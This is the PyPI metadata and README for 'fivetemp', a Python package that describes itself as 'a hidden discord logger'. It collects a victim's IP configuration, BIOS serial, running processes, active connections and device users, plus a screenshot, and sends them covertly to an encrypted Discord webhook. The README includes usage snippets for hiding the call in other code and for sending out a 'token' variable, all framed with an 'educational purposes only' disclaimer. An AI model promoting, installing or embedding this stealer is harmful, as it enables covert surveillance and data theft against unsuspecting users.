Metadata-Version: 2.1
Name: fivetemp
Version: 1.0.7
Summary: A hidden discord logger. Open for feature requests. discord.gg/zUjRjbJS educational purposes only. Added more logged info, credits to reckedpr. Fix Release 5
Home-page: https://pypi.org/project/fivetemp/
Author: Abyzms
Author-email: abyzms0@gmail.com
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: requests
Requires-Dist: rgbprint
Requires-Dist: pycryptodome

# FiveTemp (5t)
==================

A Discord import designed for educational purposes. The creator, Abyzms, is not responsible for any misusage or damages caused by using FiveTemp.

## Features
------------

* **System Information**: Retrieve detailed information about your system, including:
  + IP Address configuration
  + BIOS Serial Number
  + GPU Information
  + Active Connections
  + OS Version
  + Open Applications (tasklist)
  + Registered Device Users
* **Monitoring**: Capture a screenshot of your monitor
* **Stealth Mode**: Stay sneaky with our discreet features, including webhook encryption.

## Installation
------------

To install FiveTemp, run the following command in your terminal:
`pip install fivetemp`

## Usage/Examples
--------------

### Encrypting Your Webhook

To encrypt your webhook, use the following command:
`5t -w [YOUR_WEBHOOK]`
This will output your encrypted webhook.

### Using FiveTemp in Your Code

To use FiveTemp in your Python code, import the library and pass your encrypted webhook:

```
import five_temp
five_temp.s('encrypted_webhook')
```
To send a variable (marked as token) use the following

```
import five_temp
five_temp.st('encrypted_webhook' , VARIABLE_NAME)
```

## Updates and More
-------------------

To access the FiveTemp menu, which includes updates, other packages, and social media links, run:
`5t -m`
# or
`5t --menu`
This will open a localhost server with the following information:

* Updates: Stay up-to-date with the latest changes and features
* Other Packages: Explore other projects and tools from Abyzms
* Social Media: Connect with Abyzms on various platforms

**Upcoming Features**

* Browser Information: Get detailed information about your browser

**Special Thanks**

A huge thank you to my friend [reckedpr](https://github.com/reckedpr) for their contributions to FiveTemp.

## Feedback
----------

If you have any feedback or suggestions, please reach out to us at [abyzms0+fivetemp@gmail.com](mailto:abyzms0+fivetemp@gmail.com) or comment on our YouTube video: <https://www.youtube.com/@abyzmzs>
## Features

- IP Address configuration
- System Information
- Staying sneaky ;)
## Installation

Install FiveTemp

```bash
pip install fivetemp
```
    
## Feedback

If you have any feedback, please reach out to us at abyzms0+fivetemp@gmail.com
Or: Comment on our youtube video. https://www.youtube.com/@abyzmzs
